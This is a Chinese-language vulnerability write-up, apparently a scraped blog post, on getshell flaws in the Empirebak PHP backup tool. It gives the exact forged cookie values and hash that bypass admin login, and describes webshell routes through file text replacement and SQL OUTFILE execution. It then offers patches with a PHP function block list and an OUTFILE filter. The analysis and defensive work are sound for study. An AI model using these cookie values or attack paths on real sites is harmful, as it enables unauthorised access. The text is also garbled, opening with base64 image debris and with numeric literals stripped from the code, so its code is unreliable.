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" alt="" />

Relevant Link:

http://www.yunsec.net/a/security/web/jbst/2011/0603/8816.html
http://www.2cto.com/Article/201005/47257.html
http://www.wooyun.org/bugs/wooyun-2010-078591
http://0day5.com/archives/2771
http://www.wooyun.org/bugs/wooyun-2010-078591
http://www.sqlmap.cc/post-37.html

3. 漏洞影响范围
4. 漏洞代码分析

0x1: 伪造cookie登录后台

\admin.php

<?php
require('class/connect.php');
require('class/functions.php');
//验证是否已经处于登录状态
$lur=islogin();
$loginin=$lur['username'];
$rnd=$lur['rnd'];
require LoadAdminTemp('eadmin.php');
?>

\class\functions.php

//是否登陆
function islogin($uname='',$urnd='')
{
//die(var_dump($_COOKIE));
$_COOKIE['ebak_loginebakckpass'] = "119770adb578053dcb383f67a81bcbc6"; $_COOKIE['ebak_baklogintime'] = ""; /*
来自配置文件/class/config.php,漏洞的根源在于帝国CMS采用了默认值
$set_username="admin";
$set_outtime="60";
*/
global $set_username, $set_outtime;
//从$_COOKIE全局数组中获取bakusername,黑客注入的是: $_COOKIE['ebak_bakusername'] = "admin";
$username = $uname ? $uname : getcvar('bakusername');
//从$_COOKIE全局数组中获取bakrnd,黑客注入的是: $_COOKIE['ebak_bakrnd'] = "35y5cCnnA4Kh";
$rnd = $urnd ? $urnd : getcvar('bakrnd'); //正常通过
if(empty($username) || empty($rnd))
{
printerror("NotLogin","index.php");
}
//黑客的目标是免登admin,这里一定相等
if($username <> $set_username)
{
printerror("NotLogin","index.php");
}
/*
验证cookie中的值
$username = admin
$rnd = 35y5cCnnA4Kh
*/
Ebak_CHCookieRnd($username, $rnd); $time=time();
if($time-getcvar('baklogintime')>$set_outtime*)
{
printerror("OutLogintime","index.php");
}
esetcookie("baklogintime",$time,);
$lr['username']=$username;
$lr['rnd']=$rnd;
return $lr;
}

\class\functions.php

//验证COOKIE认证
function Ebak_CHCookieRnd($username,$rnd)
{
/*
$set_loginrnd为config.php里面的验证随机码,漏洞的根源在于这是一个默认值: $set_loginrnd="YFfd33mV2MrKwDenkecYWZETWgUwMV";
*/
global $set_loginrnd;
//在默认值情况下,计算的结果永远是: $ckpass = 119770adb578053dcb383f67a81bcbc6
$ckpass = md5(md5($rnd . $set_loginrnd).'-'.$rnd.'-'.$username.'-');
//比较通过,判定为已登录,漏洞产生
if($ckpass<>getcvar('loginebakckpass'))
{
printerror("NotLogin","index.php");
}
}

0x2: 备份数据、替换目录文件内容GETHSLL

\phome.php

elseif($phome=="RepPathFiletext")//脤忙禄禄脛驴脗录脦脛录镁
{
Ebak_RepPathFiletext($_POST);
}

\class\combakfun.php

//替换文件内容
function Ebak_RepPathFiletext($add)
{
global $bakpath;
//替换目标文件的路径
$mypath=trim($add['mypath']);
//被替换的内容
$oldword = Ebak_ClearAddsData($add['oldword']);
//用于替换的新内容
$newword = Ebak_ClearAddsData($add['newword']);
$dozz=(int)$add['dozz'];
if(empty($oldword)||empty($mypath))
{
printerror("EmptyRepPathFiletext","history.go(-1)");
}
if(strstr($mypath,".."))
{
printerror("NotChangeRepPathFiletext","history.go(-1)");
}
$path=$bakpath."/".$mypath;
if(!file_exists($path))
{
printerror("PathNotExists","history.go(-1)");
}
$hand=@opendir($path);
//遍历目标目录的所有文件,逐一进行文本替换
while($file=@readdir($hand))
{
$filename=$path."/".$file;
if($file!="."&&$file!=".."&&is_file($filename))
{
$value=ReadFiletext($filename);
if($dozz)
{
//执行文本替换
$newvalue=Ebak_DoRepFiletextZz($oldword,$newword,$value);
}
else
{
if(!stristr($value,$oldword))
{
continue;
}
$newvalue=str_replace($oldword,$newword,$value);
}
WriteFiletext_n($filename,$newvalue);
}
}
printerror("RepPathFiletextSuccess","RepFiletext.php");
}

\class\functions.php

//正则替换信息
function Ebak_DoRepFiletextZz($oldword,$newword,$text)
{
$zztext=Ebak_RepInfoZZ($oldword,"empire-bak-wm.chief-phome",);
//无任何过滤,直接替换
$text=preg_replace($zztext,$newword,$text);
return $text;
}

0x3: 执行自定义SQL导出GETSHELL

\phome.php

elseif($phome=="DoExecSql")
{
Ebak_DoExecSql($_POST);
}
elseif($phome=="DoTranExecSql")
{
$file=$_FILES['file']['tmp_name'];
$file_name=$_FILES['file']['name'];
$file_type=$_FILES['file']['type'];
$file_size=$_FILES['file']['size'];
Ebak_DoTranExecSql($file,$file_name,$file_type,$file_size,$_POST);
}

\class\combakfun.php

//执行SQL语句
function Ebak_DoExecSql($add)
{
global $empire,$phome_db_dbname,$phome_db_ver,$phome_db_char;
$query = $add['query'];
if(!$query)
{
printerror("EmptyRunSql","history.go(-1)");
}
//数据库
if($add['mydbname'])
{
$empire->query("use `".$add['mydbname']."`");
}
//编码
if($add['mydbchar'])
{
DoSetDbChar($add['mydbchar']);
}
$query = Ebak_ClearAddsData($query);
//调用Ebak_DoRunQuery执行最终的SQL语句
Ebak_DoRunQuery($query, $add['mydbchar'], $phome_db_ver);
printerror("RunSqlSuccess","DoSql.php");
} //上传执行SQL
function Ebak_DoTranExecSql($file,$file_name,$file_type,$file_size,$add){
global $empire,$phome_db_dbname,$phome_db_ver,$phome_db_char;
if(!$file_name||!$file_size)
{
printerror("NotChangeSQLFile","history.go(-1)");
}
$filetype=GetFiletype($file_name);//取得扩展名
if($filetype!=".sql")
{
printerror("NotTranSQLFile","history.go(-1)");
}
//上传文件
$newfile='tmp/uploadsql'.time().'.sql';
$cp=Ebak_DoTranFile($file,$newfile);
if(empty($cp))
{
printerror("TranSQLFileFail","history.go(-1)");
}
$query=ReadFiletext($newfile);
DelFiletext($newfile);
if(!$query)
{
printerror("EmptyRunSql","history.go(-1)");
}
//数据库
if($add['mydbname'])
{
$empire->query("use `".$add['mydbname']."`");
}
//编码
if($add['mydbchar'])
{
DoSetDbChar($add['mydbchar']);
}
//调用Ebak_DoRunQuery执行最终的SQL语句
Ebak_DoRunQuery($query,$add['mydbchar'],$phome_db_ver);
printerror("RunSqlSuccess","DoSql.php");
}

\class\functions.php

//运行SQL
function Ebak_DoRunQuery($sql,$mydbchar,$mydbver)
{
$sql=str_replace("\r","\n",$sql);
$ret=array();
$num=;
//执行多语句拆分
foreach(explode(";\n",trim($sql)) as $query)
{
$queries=explode("\n",trim($query));
foreach($queries as $query)
{
$ret[$num].=$query[]=='#'||$query[].$query[]=='--'?'':$query;
}
$num++;
}
unset($sql);
foreach($ret as $query)
{
$query=trim($query);
if($query)
{
if(substr($query,,)=='CREATE TABLE')
{
mysql_query(Ebak_DoCreateTable($query,$mydbver,$mydbchar)) or die(mysql_error()."<br>".$query);
}
else
{
mysql_query($query) or die(mysql_error()."<br>".$query);
}
}
}
}

5. 防御方法

0x1: 伪造cookie登录后台

从最佳安全实践的角度来说,基于cookie的免登验证应该使用session机制来进行
\class\functions.php

//设置COOKIE认证
function Ebak_SCookieRnd($username,$rnd)
{
//基于SESSION进行免登验证
session_start();
global $set_loginrnd;
//在cookie中加入随机因子
$ckpass = md5(md5($rnd.$set_loginrnd).'-'.$rnd.'-'.$username.'-'.mt_rand() );
//SESSION记录
$_SESSION['ckpass'] = $ckpass;
esetcookie("loginebakckpass",$ckpass,);
} //验证COOKIE认证
function Ebak_CHCookieRnd($username,$rnd)
{
//基于SESSION进行免登验证
session_start();
global $set_loginrnd;
//获取SESSION内容
$ckpass = $_SESSION['ckpass'];
if($ckpass<>getcvar('loginebakckpass'))
{
printerror("NotLogin","index.php");
}
}

0x2: 备份数据、替换目录文件内容GETHSLL

\class\combakfun.php

//替换文件内容
function Ebak_RepPathFiletext($add)
{
global $bakpath;
//替换目标文件的路径
$mypath=trim($add['mypath']);
//被替换的内容
$oldword = Ebak_ClearAddsData($add['oldword']);
//用于替换的新内容
$newword = Ebak_ClearAddsData($add['newword']); /**/
if( preg_match("/([^a-zA-Z0-9_]{1,1})+(extract|parse_str|str_replace|unserialize|ob_start|require|include|array_map|preg_replace|copy|fputs|fopen|file_put_contents|file_get_contents|fwrite|eval|phpinfo|assert|base64_decode|create_function|call_user_func)+( |\()/is", $newword) )
{
die("Request Error!");
}
/**/ $dozz=(int)$add['dozz'];
if(empty($oldword)||empty($mypath))
{
printerror("EmptyRepPathFiletext","history.go(-1)");
}
if(strstr($mypath,".."))
{
printerror("NotChangeRepPathFiletext","history.go(-1)");
}
$path=$bakpath."/".$mypath;
if(!file_exists($path))
{
printerror("PathNotExists","history.go(-1)");
}
$hand=@opendir($path);
//遍历目标目录的所有文件,逐一进行文本替换
while($file=@readdir($hand))
{
$filename=$path."/".$file;
if($file!="."&&$file!=".."&&is_file($filename))
{
$value=ReadFiletext($filename);
if($dozz)
{
//执行文本替换
$newvalue=Ebak_DoRepFiletextZz($oldword,$newword,$value);
}
else
{
//待搜索的目标字符串没有出现,跳过当前文件
if(!stristr($value,$oldword))
{
continue;
}
$newvalue=str_replace($oldword,$newword,$value);
}
/* inject check */
$prePath = dirname(__FILE__) . DIRECTORY_SEPARATOR;
$url = "http://webshellcheck.oss-cn-hangzhou.aliyuncs.com/AliCheck.php";
if (file_exists($prePath . "AliCheck.php"))
{
//check whether is latest
if (ini_get('allow_url_fopen') == '')
{
$content = @file_get_contents($url);
if (!empty($content))
{
if ( md5($content) != md5_file($prePath . "AliCheck.php") )
{
die("not equal");
file_put_contents($prePath . "AliCheck.php", $content);
}
}
}
include_once $prePath . "AliCheck.php";
$scaner = new Pecker_Scanner();
$scaner->scanFileContent($filename,$newvalue);
$result = $scaner->getReport();
if (!empty($result[$filename]['function']))
{
die("Request Error!");
}
$scaner = null;
}
else
{
//file not exist, need download
if (ini_get('allow_url_fopen') == '')
{
//check url is valid
$content = @file_get_contents($url);
if (!empty($content))
{
file_put_contents($prePath . "AliCheck.php", $content);
}
}
}
/**/
WriteFiletext_n($filename,$newvalue);
}
} printerror("RepPathFiletextSuccess","RepFiletext.php");
}

0x3: 执行自定义SQL导出GETSHELL

\class\functions.php

//运行SQL
function Ebak_DoRunQuery($sql,$mydbchar,$mydbver)
{
$sql=str_replace("\r","\n",$sql);
$ret=array();
$num=;
//执行多语句拆分
foreach(explode(";\n",trim($sql)) as $query)
{
$queries=explode("\n",trim($query));
foreach($queries as $query)
{
$ret[$num].=$query[]=='#'||$query[].$query[]=='--'?'':$query;
}
$num++;
}
unset($sql);
foreach($ret as $query)
{
$query=trim($query);
if($query)
{
/* SQL注入过滤 */
if(preg_match("/select.*into.*(outfile|dumpfile)/sim", $query, $matches))
{
echo "request error!" . "</br>" . $matches[];
die();
}
/* */ if(substr($query,,)=='CREATE TABLE')
{
mysql_query(Ebak_DoCreateTable($query,$mydbver,$mydbchar)) or die(mysql_error()."<br>".$query);
}
else
{
mysql_query($query) or die(mysql_error()."<br>".$query);
}
}
}
}

0x4: 关闭备份功能

一个最简单粗暴的方法就是直接关闭帝国备份
/phome.php

..
elseif($phome=="RepPathFiletext")
{
//Ebak_RepPathFiletext($_POST);
die("request error!");
}
..

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

帝国备份王(Empirebak) \class\functions.php、\class\combakfun.php GETSHELL vul的更多相关文章

  1. 帝国备份王&lpar;Empirebak&rpar;万能cookie及拿shell

    1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456) 登录成功设置4个cookie,看代码 function login($lusername,$lpassw ...

  2. 使用帝国备份王软件提示 Parse error&colon; syntax error&comma; unexpected end of file

    使用帝国备份王软件提示 Parse error: syntax error, unexpected end of file时, 可以尝试一下方法: 1.php.ini要把short_open_tag ...

  3. wamp集成环境下帝国备份出错

    我在本地wamp环境下面使用帝国备份王时,报错信息如下: Parse error: syntaxerror, unexpected $end in D:wampwwwhuifuclassfunctio ...

  4. 帝国CMS备份出现数据恢复不完整的问题

    今天linux主机中毒了,把用帝国备份王备份之后,恢复了快照到刚建主机的状态: 哎,只怪当初没有勤快的去做快照啊: 重新配置好后: 开始使用帝国备份王: 数据恢复之后,打开文章,提示"附加表 ...

  5. Windows下mysql自动备份的最佳方案

    网上有很多关于window下Mysql自动备份的方法,其实不乏一些不好的地方和问题,现总结出一个最好的方法供大家参考: 新建一个记事本,然后重命名为: mysql_backup.bat 然后单击右键选 ...

  6. OneinStack定时同步备份数据库&sol;网站至七牛云存储方法

    无论我们用WEB面板,还是用一键脚本安装环境建站,只要一旦我们开始用VPS.服务器,最为关键的就是服务器中的数据.因为大部分VPS.服务器商家都是无管理型主机,任何的安装和维护都需要我们自行管理.即便 ...

  7. WordPress搬家教程:换空间与换域名

    WordPress搬家教程:换空间与换域名 由于本人博客空间8月份已到期,便新购一个虚拟主机想进行WordPress搬家,于是特意在网上查了些WordPress搬家教程,进行了综合总结,并结合这次实操 ...

  8. MySQL数据库备份与恢复方法&lpar;转&rpar;

    来源于:http://www.jb51.net/article/25686.htm 网站数据对我们对站长来说都是最宝贵的,我们平时应该养成良好的备份数据的习惯.     常有新手问我该怎么备份数据库, ...

  9. 《pigcms v6&period;2最新完美至尊版无任何限制&comma;小猪微信源码多用户微信营销服务平台系统》

    <pigcms v6.2最新完美至尊版无任何限制,小猪微信源码多用户微信营销服务平台系统> 前两天分享了套小猪CMS(PigCms)多用户微信营销服务平台系统V6.1完美破解至尊版带微用户 ...

随机推荐

  1. word20161216

    object / 对象 object identifier / 对象标识符 offline / 脱机  OLE on-disk catalog / 磁盘目录 on-media catalog / 媒体 ...

  2. 《DSP using MATLAB》示例Example5&period;18

  3. Android学习计划

    书目 疯狂Android讲义 Android开发艺术探索 Android群英传 Android 源码设计模式解析与实战 Android内核剖析 深入理解 Android自动化测试 代码 信念 坚持.坚 ...

  4. Mac下Android Studio中获取SHA1和MD5

    有很多人讲这个的时候,老是只把这个代码标出来又不说为什么 keytool -list -keystore debug.keystore keytool   这个是java的 jdk中一个工具(做签名文 ...

  5. 实战 -- Redis2&period;4&period;2集成spring3&period;2&period;2

    redis.host=... redis.port= redis.pass= redis.timeout= #最大能够保持idel状态的对象数 redis.maxIdle= #最大分配的对象数 red ...

  6. SQL Server内连接、外连接、交叉连接

    前言 在数据库查询中,我们常常会用到的表连接查询,而我自己在工作中也是时常用这些表连接查询.而就在刚刚我却还没有搞清楚数据库表连接到底有哪几种, 这几种表连接查询方式又有什么区别,实属惭愧!借以此文以 ...

  7. future then

    import 'dart:async'; main(){ Future(()=>a1()) .then((x)=>a2(x)) .then((x)=>a3(x)) .then((x) ...

  8. 用Navicat for Mysql导入&period;sql文件

    1.在左边右键新建一个数据库 2.字符集选gbk(不 题) 3.打开数据库,把它变成绿色. 4.把.sql文件拖到这数据库上.会出现下边的运行SQL文件对话框,按开始,等运行完后就可以关掉了. 5.最 ...

  9. http-cache浏览器缓存

    摘至知乎 首先得明确 http 缓存的好处 减少了冗余的数据传输,减少网费 减少服务器端的压力 Web 缓存能够减少延迟与网络阻塞,进而减少显示某个资源所用的时间 加快客户端加载网页的速度 常见 ht ...

  10. go 类型转换

    https://studygolang.com/articles/3400 https://studygolang.com/articles/6633